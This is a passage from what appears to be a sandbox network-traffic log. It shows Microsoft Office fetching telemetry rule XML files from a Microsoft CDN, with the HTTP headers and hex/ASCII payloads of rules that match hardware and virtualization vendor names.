65	192.168.2.7	49790	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:43 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:43 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 90a1454b-001e-0079-3203-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115943Z-r1cf579d778g2t6ghC1EWRfggs00000001s0000000001k85 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:43 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.7	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:43 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:44 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:43 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 8a885dcd-801e-0078-280b-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115943Z-r1cf579d7784wpmvhC1EWRk4cn00000001n0000000004gk5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:44 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.7	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:44 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:44 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:44 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 337dc70d-a01e-0053-5e05-488603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115944Z-r1cf579d778d5zkmhC1EWRk6h800000002n0000000004w9g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:44 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.7	49794	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:45 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:45 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 32d588ee-b01e-003e-0206-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115945Z-r1cf579d778lntp7hC1EWR9gg400000001r0000000002wgt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:45 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.7	49795	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:45 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:45 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 9160dc9b-d01e-00ad-5f02-48e942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115945Z-r1cf579d778qlpkrhC1EWRpfc800000002x0000000003x7r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:46 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.7	49796	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:45 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:45 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 09205d62-a01e-0021-3a05-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115945Z-r1cf579d778w59f9hC1EWRze6w00000002e00000000040yf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:46 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.7	49797	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:45 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:46 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: a215b4dd-e01e-0071-4e03-4808e7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115946Z-r1cf579d7789trgthC1EWRkkfc000000032g00000000012z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:46 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.7	49798	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:46 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:46 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 1f17df4b-601e-0050-2d03-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115946Z-r1cf579d778xr2r4hC1EWRqvfs000000029g000000003pvc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:46 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.7	49799	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:47 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:47 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 4c7743ed-001e-0082-4b03-485880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115947Z-r1cf579d778xq4f9hC1EWRx41g00000002100000000045p6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:48 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.7	49801	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:47 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:48 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 83778e64-b01e-0070-6d05-481cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115948Z-r1cf579d778dndrdhC1EWR4b2400000001x0000000002yd5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:48 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.7	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:47 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:48 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: a374b664-e01e-0051-1f05-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115948Z-r1cf579d778t5c2lhC1EWRce3w0000000320000000000erx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:48 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.7	49802	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:48 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:48 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: f6e8c48a-401e-000a-8008-484a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115948Z-r1cf579d778qgtz2hC1EWRmgks00000002700000000007k8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:48 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

